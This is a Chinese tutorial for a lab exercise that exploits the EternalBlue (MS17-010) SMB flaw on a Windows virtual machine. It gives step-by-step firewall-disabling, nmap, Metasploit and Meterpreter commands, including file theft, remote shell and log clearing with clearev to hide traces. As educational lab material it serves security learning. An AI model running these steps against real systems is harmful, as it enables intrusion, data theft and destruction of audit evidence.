前言:本文章仅用于网安技术科普,所有实验均在个人虚拟机靶机内操作,严禁将技术用于非法入侵他人设备、干扰他人网络正常功能等违法违规行为,遵守《中华人民共和国网络安全法》,坚守网络安全底线。

永恒之蓝(MS17-010)是Windows系统中经典的SMB协议漏洞,利用该漏洞可远程获取目标主机最高权限,是网安学习中必掌握的渗透实验之一。本文将拆分实验环境与实验过程,先明确环境要求,再详细拆解实操步骤,从漏洞检测、利用到会话控制,一步步实操,新手也能轻松上手。

一、实验环境要求(单独说明,不与过程混淆)

1. 整体环境

  • 实验名称:MS17-010 永恒之蓝漏洞渗透实验

  • 实验工具:Nmap(端口扫描+漏洞检测)、Metasploit(漏洞利用框架)、Meterpreter(远程控制会话)

  • 网络要求:VMware虚拟机环境,攻击机与靶机需在同一网段(确保网络互通)

2. 攻击机环境(Kali Linux)

  • 系统版本:Kali Linux 202x 任意版本(推荐2023及以上,兼容性更好)

  • 网络模式:NAT模式或桥接模式(核心要求:与靶机网络互通)

  • 工具准备:nmap(自带)、msfconsole(自带)、meterpreter(Metasploit内置),无需额外安装

3. 靶机环境(Windows 实验机)

  • 推荐系统:Windows 7、Windows Server 2008 R2(默认未安装MS17-010补丁,漏洞存在概率最高)

  • 必备条件:未安装MS17-010安全补丁、445端口开放、与攻击机同一局域网、关闭防火墙或放行445、139、3389端口

  • 额外配置:需开启远程桌面(可选,用于验证渗透效果)、靶机需有用户名+登录密码(空密码无法远程)

二、实验过程(完整实操步骤,按流程排序)

实验过程分为3个核心阶段:靶机前置配置 → 攻击机漏洞检测 → 漏洞利用与会话操作,每一步均为实操关键,严格按照顺序执行,避免操作失误。

阶段1:靶机前置配置(CMD管理员身份执行)

先完成靶机基础配置,确保漏洞可被检测和利用,所有命令直接复制执行即可:

操作步骤

执行命令

操作目的

步骤1:查看靶机IP

ipconfig

记录靶机IPv4地址,后续攻击机扫描、攻击需用到

步骤2:关闭防火墙

netsh advfirewall set allprofiles state off

避免拦截攻击流量,实验核心步骤,必须执行

步骤3:开启远程桌面(可选)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

开启RDP服务,方便后续远程控制靶机,验证渗透效果

配置完成后,可通过ping命令测试与攻击机(Kali)的连通性(靶机CMD输入ping 攻击机IP),能ping通则说明网络互通。

阶段2:攻击机(Kali)漏洞检测

启动Kali,按以下步骤执行命令,检测靶机是否存在MS17-010漏洞,步骤不可逆,确保每一步执行成功:

步骤

执行命令

操作目的与说明

1

ip a

查看Kali本机IP地址,记录下来,后续设置攻击机IP需用到

2

nmap -sV -p445 --script=smb-vuln-ms17-010 靶机IP

精准检测靶机445端口(SMB协议端口),判断是否存在MS17-010漏洞,扫描高效精准

3

nmap --script smb-vuln* 靶机IP

批量检测靶机所有SMB相关漏洞,验证是否存在其他SMB漏洞,确保实验环境合规

检测结果说明:若命令输出中显示“VULNERABLE”,则说明靶机存在MS17-010漏洞,可继续后续漏洞利用步骤;若显示“NOT VULNERABLE”,则说明靶机已安装补丁,需更换靶机。

阶段3:攻击机(Kali)漏洞利用与会话操作

漏洞检测确认后,使用Metasploit框架利用漏洞,获取Meterpreter远程控制会话,再执行后续操作,步骤如下:

第一步:启动Metasploit框架,加载漏洞利用模块

步骤

执行命令

操作说明

1

msfconsole

启动Metasploit渗透测试框架,耐心等待加载完成(出现msf6 > 提示符即可)

2

search ms17-010

搜索MS17-010相关漏洞利用模块,会显示多个可用模块

3

use 0

选择第一个模块(默认是exploit/windows/smb/ms17_010_eternalblue),最常用的永恒之蓝利用模块

第二步:设置攻击参数,执行漏洞利用

步骤

执行命令

操作说明

1

set rhosts 靶机IP

设置攻击目标IP,替换为之前记录的靶机IP,确保输入正确

2

set lhost 攻击机IP(Kali)

设置攻击机IP,替换为Kali本机IP,用于接收靶机的反向连接

3

run

执行漏洞利用,耐心等待1-3分钟,成功后会进入meterpreter > 会话提示符

注意:若执行run后提示失败,检查靶机是否未安装补丁、网络是否互通、IP是否设置正确,排查后重新执行即可。

第三步:Meterpreter会话核心操作

进入meterpreter会话后,可对靶机进行多种远程操作,以下是最常用的核心命令,按需执行:

会话命令

功能描述与操作示例

ps

查看靶机所有正在运行的进程,可识别核心进程或可疑进程

screenshot

截取靶机当前屏幕,图片自动保存至Kali /root目录,可后续查看

run vcn

实时监控靶机屏幕,可实时查看靶机操作动态,退出监控按Ctrl+C

shell

获取靶机CMD命令行,输入chcp 65001解决中文乱码,可直接操作靶机

clearev

清除靶机系统日志,掩盖攻击痕迹,实验结束后建议执行

getuid

查看当前获取的靶机用户权限,显示NT AUTHORITY\SYSTEM即为最高权限

download 目标文件路径 本地保存路径

示例:download C:\test.txt /root ,将靶机C盘test.txt下载到Kali根目录

upload 本地文件路径 目标机保存路径

示例:upload /root/test.exe C:\ ,将Kali根目录test.exe上传到靶机C盘

会话退出:输入exit即可退出Meterpreter会话,关闭与靶机的连接。

三、实验注意事项与总结

1. 核心注意事项

  • 实验仅在个人虚拟机靶机内进行,严禁用于外网或他人设备,违反法律后果自负;

  • 靶机必须未安装MS17-010补丁,否则漏洞无法利用,可通过Windows更新查看补丁安装情况;

  • 实验过程中,确保攻击机与靶机网络互通,IP设置正确,否则无法获取会话;

  • 执行命令时,严格按照步骤顺序操作,避免遗漏参数(如set rhosts、set lhost);

  • 实验结束后,及时关闭靶机和攻击机,恢复靶机快照,避免漏洞被意外利用。

2. 实验总结

本次实验严格拆分实验环境与实验过程,清晰呈现了MS17-010永恒之蓝漏洞的完整渗透流程:从靶机前置配置、攻击机漏洞检测,到Metasploit漏洞利用、Meterpreter会话控制,每一步都围绕实操展开,助力掌握核心技能。

通过实验可明确:永恒之蓝漏洞的利用依赖SMB协议445端口,核心危害是“远程无权限获取系统最高权限”,同时也能掌握Nmap漏洞检测、Metasploit框架使用、Meterpreter会话操作的核心技巧。

日常防护建议:使用Windows系统时,及时安装系统安全补丁、关闭不必要的端口(如445端口)、开启防火墙,从源头防范此类漏洞攻击。

如果有遗漏与错误的地方,欢迎大家指出,有疑问和不懂的也可以留言讨论,谢谢!!!

Logo

助力广东及东莞地区开发者,代码托管、在线学习与竞赛、技术交流与分享、资源共享、职业发展,成为松山湖开发者首选的工作与学习平台

更多推荐